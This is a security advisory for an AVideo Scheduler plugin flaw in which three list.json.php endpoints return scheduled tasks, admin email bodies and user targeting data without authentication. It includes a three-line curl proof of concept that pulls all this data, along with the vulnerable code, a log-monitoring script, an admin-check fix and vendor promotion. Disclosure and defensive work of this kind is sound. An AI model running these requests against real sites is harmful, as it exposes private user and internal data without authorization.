CVE-2026-33761

CVE-2026-33761 is a medium-severity missing authorization vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet.

Summary

Three list.json.php endpoints in the Scheduler plugin lack any authentication check, while every other endpoint in the same plugin directories (add.json.php, delete.json.php, index.php) requires User::isAdmin(). An unauthenticated attacker can retrieve all scheduled tasks (including internal callback URLs and parameters), admin-composed email messages, and user-to-email targeting mappings by sending simple GET requests.

Details

The vulnerable files are:

1. plugin/Scheduler/View/Scheduler_commands/list.json.php:1-7

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Scheduler_commands.php';
header('Content-Type: application/json');

$rows = Scheduler_commands::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}

2. plugin/Scheduler/View/Emails_messages/list.json.php:1-10

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Emails_messages.php';
header('Content-Type: application/json');

$rows = Emails_messages::getAll();
$total = Emails_messages::getTotal();
?>
{"data": <?php echo json_encode($rows); ?>, ...}

3. plugin/Scheduler/View/Email_to_user/list.json.php:1-10

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Email_to_user.php';
header('Content-Type: application/json');

$rows = Email_to_user::getAll();
$total = Email_to_user::getTotal();
?>
{"data": <?php echo json_encode($rows); ?>, ...}

None of these files check authentication before calling getAll(), which executes SELECT * FROM {table} and returns the entire table contents.

In contrast, every sibling endpoint requires admin access. For example, plugin/Scheduler/View/Scheduler_commands/add.json.php:12-15:

if(!User::isAdmin()){
    $obj->msg = "You cant do this";
    die(json_encode($obj));
}

The Scheduler_commands table (defined in plugin/Scheduler/Objects/Scheduler_commands.php) stores fields including callbackURL (internal server URLs with query parameters), parameters (JSON blobs containing user IDs and email configuration), status, timezone, and cron scheduling fields. The Emails_messages table stores subject and message (full HTML email bodies composed by admins). The Email_to_user table maps users_id to emails_messages_id, revealing which users are targeted by which email campaigns.

PoC

# 1. Retrieve all scheduled tasks, exposes internal callbackURLs and parameters
curl -s 'https://target/plugin/Scheduler/View/Scheduler_commands/list.json.php' | jq '.data[] | {id, callbackURL, parameters, status, type}'

# 2. Retrieve all admin-composed email messages, exposes subject and HTML body
curl -s 'https://target/plugin/Scheduler/View/Emails_messages/list.json.php' | jq '.data[] | {id, subject, message}'

# 3. Retrieve user-to-email targeting mappings, reveals which users receive which emails
curl -s 'https://target/plugin/Scheduler/View/Email_to_user/list.json.php' | jq '.data[] | {users_id, emails_messages_id, sent_at}'

All three return full database contents with no authentication required. No session cookie or token is needed.

Impact

An unauthenticated attacker can:

  • Enumerate internal infrastructure: callbackURL fields expose internal server URLs and query parameters used by the scheduler, potentially revealing internal API endpoints and their parameter structures
  • Read admin email campaigns: Full email subjects and HTML message bodies composed by administrators are exposed
  • Map user targeting: The Email_to_user table reveals which users_id values are targeted by which email campaigns, enabling user enumeration and profiling
  • Gather reconnaissance: Scheduling configuration (cron fields, execution status, timezone) reveals operational patterns and timing of automated tasks

The information disclosed could be used to facilitate further attacks (e.g., using discovered internal URLs for SSRF, or user IDs for targeted account attacks).

The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.

CVE-2026-33761 has a CVSS score of 5.3 (Medium). The vector is network-reachable, requires no privileges, and needs no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
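As an added example (not part of the advisory or the AVideo project), the following Python script scans web-server access logs for reads of the three exposed list.json.php endpoints from sources other than a known admin address, which is the monitoring signal a defender can collect while no fixed version exists. The sample log lines and the admin address 10.0.0.5 are constructed for illustration, and the Apache/nginx "combined" log format is assumed.

```python
import re
from collections import defaultdict

# The three unauthenticated endpoints named in the advisory.
EXPOSED_PATHS = (
    "/plugin/Scheduler/View/Scheduler_commands/list.json.php",
    "/plugin/Scheduler/View/Emails_messages/list.json.php",
    "/plugin/Scheduler/View/Email_to_user/list.json.php",
)

# Apache/nginx "combined" format: ip ident user [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    rec["path"] = rec["path"].split("?", 1)[0]  # compare the path without its query string
    return rec

def find_scheduler_reads(lines, admin_ips=frozenset()):
    """(ip, time, path, status, size) for each hit on an exposed endpoint from a non-admin source."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] not in EXPOSED_PATHS or rec["ip"] in admin_ips:
            continue
        hits.append((rec["ip"], rec["time"], rec["path"], rec["status"], rec["size"]))
    return hits

def endpoints_read_per_source(hits):
    """Distinct exposed endpoints each source read with HTTP 200; all three in a row matches the PoC."""
    per_ip = defaultdict(set)
    for ip, _time, path, status, _size in hits:
        if status == 200:
            per_ip[ip].add(path)
    return {ip: len(paths) for ip, paths in per_ip.items()}

# Constructed sample traffic (not real logs); 10.0.0.5 is assumed to be the admin workstation.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2026:09:14:02 +0000] "GET /plugin/Scheduler/View/Scheduler_commands/list.json.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2026:09:20:11 +0000] "GET /plugin/Scheduler/View/Scheduler_commands/list.json.php HTTP/1.1" 200 4120 "-" "curl/8.4.0"
203.0.113.7 - - [12/Mar/2026:09:20:12 +0000] "GET /plugin/Scheduler/View/Emails_messages/list.json.php HTTP/1.1" 200 9831 "-" "curl/8.4.0"
203.0.113.7 - - [12/Mar/2026:09:20:13 +0000] "GET /plugin/Scheduler/View/Email_to_user/list.json.php?x=1 HTTP/1.1" 200 2210 "-" "curl/8.4.0"
198.51.100.9 - - [12/Mar/2026:09:31:40 +0000] "GET /plugin/Scheduler/View/Scheduler_commands/add.json.php HTTP/1.1" 200 45 "-" "curl/8.4.0"
""".splitlines()
```

Running `find_scheduler_reads(SAMPLE_LOG, admin_ips={"10.0.0.5"})` on the sample yields three hits, all from 203.0.113.7, and `endpoints_read_per_source` reports that this source read all three tables; once the admin check from the remediation section is deployed, the same query should show only non-200 responses from unknown sources.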

Affected versions

wwbn/avideo (<= 26.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Add User::isAdmin() checks to all three list.json.php files, matching the pattern used by sibling endpoints. For each file, add the following after the require_once lines and before the data retrieval:

plugin/Scheduler/View/Scheduler_commands/list.json.php:

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Scheduler_commands.php';
header('Content-Type: application/json');

if(!User::isAdmin()){
    die(json_encode(['error' => true, 'msg' => 'Not authorized']));
}

$rows = Scheduler_commands::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}

Apply the same pattern to Emails_messages/list.json.php and Email_to_user/list.json.php.

Frequently Asked Questions

  1. What is CVE-2026-33761? CVE-2026-33761 is a medium-severity missing authorization vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet. The application does not perform an authorization check before performing a sensitive operation.
  2. How severe is CVE-2026-33761? CVE-2026-33761 has a CVSS score of 5.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33761? wwbn/avideo (composer) versions <= 26.0 are affected.
  4. Is there a fix for CVE-2026-33761? No fixed version is listed for CVE-2026-33761 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-33761 exploitable, and should I be worried? Whether CVE-2026-33761 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-33761 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33761? No fixed version is listed yet. In the interim: Keep the dependency up to date. Ensure authorization checks are enforced consistently on all sensitive operations.

